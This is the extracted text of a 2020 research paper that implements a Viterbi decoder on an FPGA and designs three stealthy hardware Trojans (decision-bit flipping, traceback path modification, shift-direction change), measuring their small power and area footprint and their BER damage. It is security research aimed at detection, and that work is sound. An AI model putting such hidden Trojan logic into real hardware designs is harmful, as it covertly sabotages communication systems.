10.7717/peerj-cs.250 Copyright 2020 Kakkara et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.250 mailto:b_karthi@�cb.�amrita.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.250 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ This allows an adversary to deteriorate the performance of a communication system and expose the system to attacks. This makes understanding of the hardware level threats significant. In this work, we focus on the effect of one such threat called hardware Trojans, on coded communication systems that use a Viterbi decoder as the error correcting unit. Overview of coded communication system Design of efficient coder–decoder for error control has received increased interest in recent years. This is due to the fact that all digital transmission and storage requires error control strategy to ensure reliability. Information symbols from a source are encoded by the addition of controlled redundancy. Convolutional codes and block codes are the broad classification of error control codes. An error control decoder makes the best estimate of the transmitted codeword by making use of the redundancy added at the encoder. The transmitted codewords are encoded information symbols that are subject to errors, in the process of transmission through noisy communication channels. These transmitted codewords can be decoded with as low bit error rate (BER) as possible for transmission rates upto the channel capacity (Sweeney, 2002). The block level representation of a coded communication system is shown in Fig. 1. Hardware Trojans In the current scenario of integrated circuits (ICs) manufacturing, a globalized business model has emerged where ICs are manufactured in foundries that are distributed in various parts of the world. A hardware Trojan is a malicious stealthy modification that leads to malfunctioning of the system (Colins, 2007). Such modifications in the system provides a back door entry for the Trojans. The three main categories of hardware Trojans are based on their action, physical and activation characteristics (Chakraborty, Narasimhan & Bhunia, 2009; Tehranipoor & Koushanfar, 2010; Karri et al., 2010, Banga et al., 2008; Ranjani & Devi, 2017). The physical characteristics category describes the various hardware manifestations of Trojans according to their shape and Figure 1 Coded communication system. Full-size DOI: 10.7717/peerj-cs.250/fig-1 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 2/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-1 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ size; the activation characteristics describe the conditions that activate the Trojans and action characteristics refer to the behavior of the Trojans. Figure 2 gives the classification of Trojans based on insertion phase, abstraction level, activation mechanism and effects. Hardware Trojans can be inserted at different stages of IC design cycle, while the most prevalent phases are design and fabrication. Likewise, Trojans can be realized at different levels of IC design abstraction and can be designed to get triggered internally by specific states of the system, or externally through any communication medium. The former can be stealthy based on the occurrence of the problem states, while the latter will be untraceable in test phase because it is not triggered internally. Regarding the effect of Trojans on the affected system, they are generally designed by the adversary to change functionality or leak sensitive information or deny service during critical instances or compromise the communication system and reduce the reliability of the design (Karri et al., 2010). There are numerous post manufacturing techniques for detecting Trojans but a single technique is difficult to be devised for detecting Trojans universally. Side channel and logic testing form the two classical Trojan detection techniques (Narasimhan et al., 2013). In these two methods, a golden circuit is used to compare with outputs of the circuit under test. Typically, Trojans are devised to activate rarely to escape logic testing and evade detection. They also possess small physical characteristics to evade side channel based testing. Trojan modeling Trojans are generally modeled for the specific design of interest that they intended to disrupt. Examples of Trojan benchmark circuits aimed at infecting systems like advanced encryption system, serial interface RS232, Ethernet MAC, 8051 and PIC microcontrollers can be found at (TrustHUB, 2019). These circuit models have been widely used to study the effectiveness of Trojan infection and to design measures to thwart them. To study the Trojan effect on other systems, custom Trojan models are designed. A few Figure 2 Hardware Trojan taxonomy. Full-size DOI: 10.7717/peerj-cs.250/fig-2 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 3/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-2 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ studies that have been done in recent years on a system level using custom Trojan models are listed below: 1. Saeidi & Garakani (2016): Multiple hardware Trojans have been designed for a 256 × 128 array of six transistor SRAM block, that either corrupt the output or modify the delay and duty cycle of the enable signals. The Trojans are trigged by an address sequence that is not generally produced in conventional testing methodology, thereby helping them to evade detection by conventional SRAM testing. 2. Tiwari et al. (2019): A hardware Trojan model has been proposed for launching denial of service attack to on-chip multicast routing algorithms. The Trojan is modeled to use the on-chip temperature sensor information to identify suitable nodes and launch attack on multicast data packets. 3. Liu et al. (2016): The design and custom silicon implementation of secret key leaking Trojans present in the ultrawide band transmitter of a wireless cryptographic IC has been presented. The Trojan circuit leaks the encryption key without disrupting the normal operation. This is achieved by hiding the key in the power amplitude and frequency margins that are acceptable due to process variations. 4. Kumar et al. (2018): Novel hardware Trojans are proposed that induces denial of service and performance degradation in a Network on Chip. The Trojan is triggered by a complex bit pattern generated from input messages, intended toward misleading the packets away from the destination address. 5. Subramani et al. (2019): Hardware Trojan attack is modeled by modifying the encoder block of a 802.11 a/g transmitter. This is accomplished by hijacking some of the legitimately encoded bits and substituting with rogue bits. Trojan modeling of channel decoders Channel decoders are a quintessential part of any coded communication system. They are soft targets for Trojan attacks and can be embedded with malicious blocks for the following reasons: (Hemati, 2016). 1. They have a direct interface with the outside world that make them susceptible to being hijacked. 2. They process noisy information that makes it impossible for a even a perfectly functional decoder to be successful all the time. Hence a Trojan affected system may easily claim false failures and masquerade its real purpose. 3. Brute force approach of running all test cases to identify malicious activity is not practical with even a medium size block length since the number of input and output combinations will be huge. In spite of the fact that channel decoders are highly susceptible to Trojan attacks, the effects of Trojans on them hasn’t been explored in literature. Hemati (2016) have proposed the use of stochastic techniques at a system level for mitigating Trojan effects in a channel decoder but an RTL level analysis is missing. Our work involves the proposal and Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 4/21 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ analysis of possible Trojans on a specific channel decoder namely, the Viterbi decoder. The work is concentrated toward RTL design of a Viterbi decoder and possible Trojans that may potentially compromise the communication system and reduce the reliability of the decoder. Viterbi algorithm is widely used for decoding convolutional codes since it achieves maximum likelihood estimate of the convolutionally coded transmitted sequence (Forney, 1973). A low BER can be achieved by a Viterbi decoder (Viterbi, 1967). However the presence of Trojans can affect the performance of the decoder significantly. This has been demonstrated with a proof of concept in our earlier work (Aravind et al., 2018). Trojan models were proposed and behavioral modeling studies at the algorithmic level showed that the BER performance of convolution decoder using the Viterbi algorithm is degraded due to the presence of the hardware Trojans. The current work extends this proof of concept to a RTL level circuit design of the decoder and the Trojan activities. A practical implementation of the Viterbi decoder is achieved and the Trojan effects on the system is analyzed. The article is organized as follows. The Viterbi decoder section details the reader about the Viterbi algorithm with a suitable example. This is followed by the section on the hardware design of the decoder for FPGA implementation. Results from simulation and FPGA implementation of the decoder are discussed after that, followed by the section on the design of the Trojans. Results and discussions on the Trojan based design are presented and the article then concludes with references to possible future work. VITERBI DECODER The n encoded output in a (n, k, m) convolutional code depends on the k present input blocks as well the m past input blocks. A memory m sequential circuit is used for realizing the convolutional encoder. The trellis diagram of the rate half, m = 2, convolutional encoder is shown in Fig. 3. The corresponding state diagram of the trellis is shown in Fig. 4. Figure 3 Trellis structure of the convolutional encoder. Full-size DOI: 10.7717/peerj-cs.250/fig-3 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 5/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-3 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ The state transitions and the outputs reached in response to changes in input are represented in the state diagram. In the trellis diagram the same information is described in stages which represent the different time instants. With states representing the past memory contents of the encoder and branches representing the state transitions, the trellis path traced by the Viterbi decoder is a sequence of branches. The input message bit corresponding to each branch in the sequence of branches represent the decoded message sequence. By adding terminating zeros to the message sequence it is ensured that the decoder always starts in an all-zero initial state for decoding a message sequence. A detailed example showing the decoding procedure may be found in the Supplemental Document. FPGA BASED VITERBI DECODER DESIGN The Viterbi decoder was designed in Verilog and implemented on a Xilinx Zybo-Z7010 board. Figure 5 shows the top level implementation structure that includes the core decoder block, a single port block RAM (BRAM) of size 8 × 1,024 to store the input data Figure 4 State transitions of the encoder. Full-size DOI: 10.7717/peerj-cs.250/fig-4 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 6/21 http://dx.doi.org/10.7717/peerj-cs.250/supp-1 http://dx.doi.org/10.7717/peerj-cs.250/fig-4 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ and a single port block RAM of size 8 × 512 to store the decoded data. Along with these, an universal asynchronous receiver transmitter (UART) transmitter module is also integrated to monitor the decoded data on a PC. Input interface The noise added encoded message is stored in the input BRAM and data is transferred to the decoder block through the input interface. The interface logic unit consists of a counter and an eight bit shit register as shown in Fig. 6. It reads the data byte-wise from the BRAM and transmits two bits per clock cycle to the decoder block for further processing. At every clock cycle two LSB bits are shifted out to the branch metric unit (BMU) block. After every four clock cycles, the subsequent BRAM location is read and processed similarly. Figure 5 Block level diagram for FPGA implementation of Viterbi decoder. Full-size DOI: 10.7717/peerj-cs.250/fig-5 Figure 6 Input interface. Full-size DOI: 10.7717/peerj-cs.250/fig-6 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 7/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-5 http://dx.doi.org/10.7717/peerj-cs.250/fig-6 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ Decoder design Figure 7 shows the top level block diagram of the decoder consisting of the BMU, path metric unit (PMU), survivor path memory unit (SPMU), spmu_controller and the trace back unit (TBU). Branch metric and path metric units The BMU calculates the Hamming distance between the received frame and the branch word while the PMU performs add-compare-select (ACS) calculations as described in Middya & Dhar (2016). Figures 8 and 9 show the blocks used for the Hamming distance calculation and the ACS units. During every clock cycle, BMU calculates the eight branch metrics corresponding to the two transitions of each of the four states. The branch metrics are then passed on to the PMU that updates each state with the least path metric corresponding to each of the states and also stores the corresponding path leading to it in the form of a “decision bit,” one for each of the four states at every time instant. It can be seen from the trellis diagram in Figure 7 Decoder block diagram. Full-size DOI: 10.7717/peerj-cs.250/fig-7 Figure 8 Hamming distance unit. Full-size DOI: 10.7717/peerj-cs.250/fig-8 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 8/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-7 http://dx.doi.org/10.7717/peerj-cs.250/fig-8 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ Fig. 3 that each state has two incoming paths. The decision bit is set to “0” if the state is reached from the top branch while it is set to “1” if it is reached from the bottom branch. Figure 10 shows the block diagram of the PMU block to update the path metrics and for decision bit calculations for the four states. Survivor path memory unit and trace back unit Survivor path memory is designed as a single port BRAM that stores the decision bit values of all states at each of the time instants. The structure of the SPMU is the same as the trellis structure shown in Fig. 3. For the input data size of 1,024 bytes, the number of decision bits generated would be 4,096 for every state. Thus a 4 × 4,096 BRAM is used as the SPMU. The SPMU_update module reads the decision bits from the PMU block and updates the SPMU every clock cycle. This continues till the SPMU is populated with all the 4 × 4,096 Figure 10 PMU blocks for all the four states. Full-size DOI: 10.7717/peerj-cs.250/fig-10 Figure 9 Add carry select block. Full-size DOI: 10.7717/peerj-cs.250/fig-9 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 9/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-10 http://dx.doi.org/10.7717/peerj-cs.250/fig-9 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ decision bit values. Once the SPMU is populated with the decision bits, the decode_en bit is triggered high and the trace back unit kicks in to start the reverse process to decode the original input bits. Figure 11 shows the state machine used for the trace back operation. Since the encoded message is terminated with zeros, the final state of the system would be the zero state and hence TBU can be safely initialized to start the decoding from the zero state. After decoding all the 4,096 bits, decode_done signal is activated to trigger the output interface. It is to be noted that it takes around 4,096 clock cycles for the forward tracing, 4,096 clock cycles for traceback and few cycles are required for synchronization. Output interface The output interface consists of a first-in-first-out (FIFO) buffer of size 8 × 512 (4,096 bits) to store the decoded data and the baud generator and transmitter modules of UART to transmit the data serially on to a PC. The UART is designed with a frame length of 10 (one start bit, eight data bits and one stop bit) and works at a baud-rate of 9,600 bps. Figure 12 shows the UART frame used in the design. The data from the decoder is first stored in the FIFO and is transmitted when an external request for data transfer is enabled. The FIFO is designed using a BRAM of size 8 × 512. FIFO is chosen to be one byte wide to enable byte wise data transfer to the UART Figure 12 10 bit UART frame. Full-size DOI: 10.7717/peerj-cs.250/fig-12 Figure 11 State transition diagram of the trace back unit (TBU). Full-size DOI: 10.7717/peerj-cs.250/fig-11 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 10/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-12 http://dx.doi.org/10.7717/peerj-cs.250/fig-11 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ transmitter easily. Figure 13 shows the transmitter block designed to operate at a baud rate of 9,600 bps. The UART transmitter contains the baud generator that generates the UART clock corresponding to a baud rate of 9,600 bps. To generate this clock from the master clock, we use a clock divider whose value can be obtained by using Eq. (1) Baudrate ¼ master clkð16 � divisorÞ (1) Since the master clock of the FPGA board (Zybo-Z7010 ) is 125 MHz, we need to design a clock divider of value given by Eq. (2) divisor ¼ master clkð16 � BaudrateÞ ¼ 813:4 (2) Rounding off to the nearest highest integer, we use a clock divider of value 814 to generate the UART clock and data is transmitted out serially to the PC through a RS232 interface. SIMULATION AND IMPLEMENTATION OF VITERBI DECODER Input data generation A coded communication system is set up as detailed in the introduction section, using MATLAB. 4 K message bits are generated randomly and encoded using a convolutional encoder of rate 1/2 to generate 8 K encoded bits. Binary phase shift keying modulation is used to modulate the encoded message stream and the resulting data sequence is transmitted through an additive white gaussian noise channel of varying signal to noise rations (SNRs). The received sequences are demodulated and stored as inputs for the Viterbi decoder. Design and functional verification The Viterbi decoder was first designed using a behavioral model in MATLAB and then a synthesizable RTL design was done in Verilog. The original encoded message sequence (without noise addition) is given as input to the decoders and the output was verified to be the original message sequence. This establishes that the decoders are functionally correct. Figure 13 UART transmitter. Full-size DOI: 10.7717/peerj-cs.250/fig-13 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 11/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-13 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ Having verified the functionality of the designs using the encoded message as the inputs, the noise-added sequences are given as inputs and the BERs are computed. FPGA implementation The RTL design of the decoder was synthesized on to a Zybo board that is built using Z-7010, a member of Xilinx Zynq-7000 family. Z-7010 is designed using Xilinx all programable system-on-chip architecture, that integrates a Xilinx 7-series FPGA along with an ARM based Cortex-A9 processor. In our work, we have not used the ARM processor for generating test inputs but instead, the test vectors are generated from MATLAB as briefed above and a single port BRAM is initialized with these input test vectors. The decoded output bits are first stored in another BRAM and then sent by the UART transmitter to the PMOD pins of the Zybo board. This transmitted data is driven through a UART-to-USB translator (PL2303) and the serial bits are captured on the PC using Real Term serial terminal (RealTerm, 2019). Functional verification of the implemented design was done in the same manner as the simulated design. The encoded message bits without noise addition were given as the input and the decoded bits were compared with the original message sequence. It was Figure 14 Comparative BER plots for MATLAB behavioral design, RTL design and the FPGA implementation (beyond 6 dB, the BER is zero). All three plots overlap perfectly, thus establishing the correctness of the implementation. Full-size DOI: 10.7717/peerj-cs.250/fig-14 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 12/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-14 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ verified that the decoded and input message bits matched successfully. For calculating the decoder performance, the decoder was fed with noisy data of different SNRs. Figure 14 shows the BERs obtained for the MATLAB behavioral model, the RTL design and the FPGA implementation where it can be seen that the BER drops down to zero for SNRs greater than 6 dB1. Also, there is a perfect overlap of all the plots, thus demonstrating the equivalence of the behavioral, RTL and the implemented models. TROJAN DESIGN AND IMPLEMENTATION In this work, we propose the design of three possible Trojans and study how their stealthy presence may affect the system performance. Trojan design 1: decision-bit flipping Trojan (PMU Trojan) In the PMU, it is expected that the comparator identifies the least path metric path and correspondingly store a “1” or “0” to indicate either of the paths to be traversed during trace back. The proposed Trojan Decision-bit flipping, when enabled, flips the decision bits thus causing the trace back unit to proceed in an incorrect decoding path. The hardware model of the Trojan circuit is shown in Fig. 15. The decision bit is inverted when Trojan is enabled and the SPMU gets populated with an incorrect value. This causes the lower metric path to be discarded instead of the higher path metric, thus resulting in possible erroneous decoding. Trojan design 2: traceback path modification Trojan During trace back, the decision bits from the SPMU is read and a path is chosen based on whether the stored value is a “0” or a “1”. The traceback path modification Trojan inverts this logic and changes the state transitions, thus making it proceed in the wrong path. Figure 16 shows the modified state machine due to the Trojan being effective. When the Trojan is enabled, the transitions are made to differ from the original state transitions resulting in erroneous decoding. Trojan design 3: shift-direction-modifying Trojan In the output interface, when the decoded data is being written into the shift register, normally it will be right shift operation. But when the Trojan is enabled this operation will be reversed and performs left_shift thus sending erroneous data to the transmitter. This can be achieved by the use of multiplexers that can alter the shift direction based on Figure 15 PMU Trojan. Full-size DOI: 10.7717/peerj-cs.250/fig-15 1 Since the BER is plotted on a log scale, it is not possible to indicate the zero values on the plot Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 13/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-15 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ the Trojan enable signal. Figure 17 shows the Trojan circuitry that is created due to this Trojan. RESULTS AND DISCUSSIONS The effectiveness of the designed Trojans can be gauged by their stealthy nature and by their propensity to degrade the performance of the infected system. Figure 17 Shift direction modifying Trojan. Full-size DOI: 10.7717/peerj-cs.250/fig-17 Figure 16 Trojan effect modifying the trace back path in the TBU. Full-size DOI: 10.7717/peerj-cs.250/fig-16 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 14/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-17 http://dx.doi.org/10.7717/peerj-cs.250/fig-16 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ Stealthy Trojans Trojans by nature are stealthy in nature and are difficult to detect. To verify if the proposed Trojan models are stealthy enough to evade detection, the difference in the area and power dissipated due to the Trojan insertion are calculated. Tables 1 and 2 show the power and utilization summary of the Trojan free circuits and the Trojan affected circuits. It is to be noted that the parameters obtained is only for the decoder logic without including the input BRAM and the output UART. It can be seen from the power and area utilization results that in the worst case, there is a difference of only 4 mw of on-chip power (difference of 3.1%), and only four extra LUTs (change of 0.5%) due to the Trojan insertions. This establishes its stealthy nature, thus qualifying them as effective Trojans. Performance degradation To analyze how effectively the Trojans disrupt the natural decoding process, the Trojans are triggered at random time instants and the decoded bits are analyzed. Generally, Trojans are designed to activate surreptitiously in order to go unnoticed. Hence the triggering was done only once during the entire decoding process and the effect of this triggering is observed and the resultant BER is calculated. Trojan triggering logic Figure 18 shows the circuit for generating Trojan enable signal. It consists of a BRAM, a 14 bit counter to count up to the maximum possible number of clock cycles required for decoding and a comparator. The Trojan can be triggered any time during the entire duration of decoding. To identify these triggering instances, 50 random numbers are generated and stored in a block RAM. During each triggering one location is read from the BRAM as the triggering instance. The Trojan enable signal is generated when the counter value matches with the random number being read from the BRAM. The BER is calculated to be the average of the BERs obtained from all the triggering instances. Table 1 Power summary table. Power summary (W) Without trojan PMU trojan TBU trojan Shift modification trojan Total on-chip power 0.129 0.129 0.133 0.13 Dynamic 0.025 0.025 0.03 0.026 Device static 0.104 0.104 0.104 0.104 Table 2 Utilization summary table. Utilization Without trojan PMU trojan TBU trojan Shift modification trojan Site type Available Used Util% Used Util% Used Util% Used Util% Slice LUTs 17,600 453 2.57 451 2.56 457 2.59 455 2.58 LUT as logic 17,600 197 1.11 195 1.1 201 1.14 199 1.13 LUT as memory 6,000 256 4.26 256 4.26 256 4.26 256 4.26 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 15/21 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ Figure 18 Trojan triggering logic. Full-size DOI: 10.7717/peerj-cs.250/fig-18 Figure 19 BER plot for PMU Trojan. Full-size DOI: 10.7717/peerj-cs.250/fig-19 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 16/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-18 http://dx.doi.org/10.7717/peerj-cs.250/fig-19 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ Effect of the triggered Trojans The effect of the Trojans may be quantified by the increase in the BERs of the infected decoder. Figures 19–21 show the comparative BER graphs of the decoder without Trojan and with Trojan being activated only once. It can be seen that in the absence of Trojans, the BER drops down to zero for SNRs greater than 6 dB, but with the Trojans being active, the BER doesn’t reduce to zero even for high SNRs. Thus the Trojans leave a distinctive BER signature (high BER). Among the three Trojans, the BER signature is highest for TBU Trojan and lowest for PMU Trojan, with the shift modification Trojan producing a BER signature in between the other two. It is also interesting to note that the difference in the performances between the Trojan free design and the design with Trojans is negligible in the low SNR regions but the difference is prominent in the high SNR regions. Also at some low SNR conditions, the performance of the Trojan affected system is slightly better than the unaffected system. This scenario is possible since, in the low SNR regions, the data itself is noisy and erroneous. During the bit flipping or the state transition or the shift direction modifying actions of the Trojans there exists a possibility that few erroneous bits are converted to correct bits, thus providing a reverse effect on the system. The possibility of this kind of behavior, along with the fact that Trojans are stealthy make it difficult to conjure Figure 20 BER plot for TBU Trojan. Full-size DOI: 10.7717/peerj-cs.250/fig-20 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 17/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-20 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ effective Trojan detection schemes. To counter such situations, the current focus of researchers is to neutralize them apart from detecting the Trojans (Gunti & Lingasubramanian, 2017). Study limitations The study proposes stealthy Trojans—decision bit flipping, traceback path modification and shift direction changing Trojans—and their effect on the decoding efficiency of a Viterbi decoder. The Trojans degrade the performance of the decoder, causing it to have a high BER. But, it is to be noted that high BER can also arise in a system due to high noise in the channel. Hence in situations where the channel’s noise characteristics are unknown, the presence of these Trojan can’t be inferred purely from the BER signature. It needs to be augmented with other Trojan detection schemes to correctly infer the presence of Trojans. CONCLUSIONS In this work, we have designed a FPGA based implementation of a Viterbi decoder and presented possible effects of hardware Trojans on coded communication systems. Three unique threat models are developed and tested on the Viterbi decoder which is popular Figure 21 BER plot for shift direction modifying Trojan. Full-size DOI: 10.7717/peerj-cs.250/fig-21 Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 18/21 http://dx.doi.org/10.7717/peerj-cs.250/fig-21 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ for its low BER performance. However, we show that the presence of the proposed Trojans affect the efficiency of the Viterbi decoder by increasing the BER. The stealthiness of the proposed Trojans is also established. Using the proposed threat models, we envision to test their effects on complex systems like CPS and IoT which rely on efficient communication channels. With the wide application of convolution codes in various SNR scenarios, the results of the implemented system play a significant role in emphasizing the need for efficient Trojan detection schemes. It is envisaged that apart from BER signature analysis, other Trojan detection and neutralizing schemes will be explored for the proposed Trojans. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by Space Application Center, ISRO through RESPOND project /ISRO/RES/3/732/16-17. Deepak Mishra from ISRO is a coauthor and was involved in the study design, analysis and preparation of the article. Grant Disclosures The following grant information was disclosed by the authors: Space Application Center, ISRO through RESPOND Project: /ISRO/RES/3/732/16-17. Competing Interests Deepak Mishra is a scientist at the Indian Space Research Organization (ISRO), Ahmedabad, India. Author Contributions � Varsha Kakkara conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Karthi Balasubramanian conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � B. Yamuna conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Deepak Mishra conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Karthikeyan Lingasubramanian conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Senthil Murugan conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 19/21 http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ Data Availability The following information was supplied regarding data availability: The raw data generated from MATLAB are available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.250#supplemental-information. REFERENCES Aravind AR, Kesavaraman SR, Balasubramanian K, Yamuna B, Lingasubramaniam K. 2018. Effect of hardware trojans on the performance of a coded communication system. In: 2018 IEEE International Conference on Consumer Electronics (ICCE). Las Vegas: IEEE, 1–6. Banga M, Chandrasekar M, Fang L, Hsiao MS. 2008. Guided test generation for isolation and detection of embedded trojans in ICs. In: Proceedings of the 18th ACM Great Lakes symposium on VLSI. New York: ACM, 363–366. Chakraborty RS, Narasimhan S, Bhunia S. 2009. Hardware trojan: threats and emerging solutions. In: 2009 IEEE International High Level Design Validation and Test Workshop. San Francisco: IEEE, 166–171. Colins D. 2007. Trust in Integrated Circuits (TIC): DARPA Solicitation BAA07-24. Arlington County: DARPA. Forney GD. 1973. Convolutional codes 11. maximum-likelihood decoding. Information and Control 25(3):222–266 DOI 10.1016/S0019-9958(74)90870-5. Gunti NB, Lingasubramanian K. 2017. Effective usage of redundancy to aid neutralization of hardware Trojans in integrated circuits. Integration 59:233–242 DOI 10.1016/j.vlsi.2017.06.002. Hemati S. 2016. Mitigating hardware cyber-security risks in error correcting decoders. In: 2016 9th International Symposium on Turbo Codes and Iterative Information Processing (ISTC). Brest: IEEE, 181–185. Karri R, Rajendran J, Rosenfeld K, Tehranipoor M. 2010. Trustworthy hardware: identifying and classifying hardware Trojans. Computer 43(10):39–46 DOI 10.1109/MC.2010.299. Kumar M, Swain AK, Kumar S, Sahoo SR, Mahapatra K. 2018. Run time mitigation of performance degradation hardware trojan attacks in network on chip. In: 2018 IEEE Computer Society Annual Symposium on VLSI (ISVLSI). Hong Kong: IEEE, 738–743. Liu Y, Jin Y, Nosratinia A, Makris Y. 2016. Silicon demonstration of hardware trojan design and detection in wireless cryptographic ICs. IEEE Transactions on Very Large Scale Integration (VLSI) Systems 25(4):1506–1519 DOI 10.1109/TVLSI.2016.2633348. Middya A, Dhar AS. 2016. Real-time area efficient and high speed architecture design of viterbi decoder. In: 2016 2nd International Conference on Advances in Electrical, Electronics, Information, Communication and Bio-Informatics (AEEICB). Chennai: IEEE, 246–250. Narasimhan S, Du D, Chakraborty RS, Paul S, Wolff FG, Papachristou CA, Roy K, Bhunia S. 2013. Hardware trojan detection by multiple-parameter side-channel analysis. IEEE Transactions on Computers 62(11):2183–2195 DOI 10.1109/TC.2012.200. Ranjani RS, Devi MN. 2017. Malicious hardware detection and design for trust: an analysis. Elektrotehniski Vestnik 84(1/2):7–16. RealTerm. 2019. Serial/TCP terminal. Available at https://sourceforge.net/projects/realterm/ (accessed 23 April 2019). Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 20/21 http://dx.doi.org/10.7717/peerj-cs.250#supplemental-information http://dx.doi.org/10.7717/peerj-cs.250#supplemental-information http://dx.doi.org/10.7717/peerj-cs.250#supplemental-information http://dx.doi.org/10.1016/S0019-9958(74)90870-5 http://dx.doi.org/10.1016/j.vlsi.2017.06.002 http://dx.doi.org/10.1109/MC.2010.299 http://dx.doi.org/10.1109/TVLSI.2016.2633348 http://dx.doi.org/10.1109/TC.2012.200 https://sourceforge.net/projects/realterm/ http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ Saeidi R, Garakani HG. 2016. Sram hardware trojan. In: 2016 8th International Symposium on Telecommunications (IST). Tehran: IEEE, 719–722. Subramani KS, Antonopoulos A, Abotabl AA, Nosratinia A, Makris Y. 2019. Demonstrating and mitigating the risk of a FEC-based hardware trojan in wireless networks. IEEE Transactions on Information Forensics and Security 14(10):2720–2734. Sweeney P. 2002. Error control coding: from theory to practice. New York: John Wiley & Sons. Tehranipoor M, Koushanfar F. 2010. A survey of hardware trojan taxonomy and detection. IEEE Design & Test of Computers 27(1):10–25. Tiwari B, Yang M, Jiang Y, Wang X. 2019. Effect of hardware trojan attacks on the performance of on-chip multicast routing algorithms. In: 2019 IEEE 9th Annual Computing and Communication Workshop and Conference (CCWC). Las Vegas: IEEE, 623–629. TrustHUB. 2019. Trojan benchmarks. Available at https://trust-hub.org/benchmarks/trojan (accessed 15 August 2019). Viterbi A. 1967. Error bounds for convolutional codes and an asymptotically optimum decoding algorithm. IEEE Transactions on Information Theory 13(2):260–269. Kakkara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.250 21/21 https://trust-hub.org/benchmarks/trojan http://dx.doi.org/10.7717/peerj-cs.250 https://peerj.com/computer-science/ A Viterbi decoder and its hardware Trojan models: an FPGA-based implementation study Introduction Viterbi decoder Fpga based viterbi decoder design Simulation and implementation of viterbi decoder Trojan design and implementation Results and discussions Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default 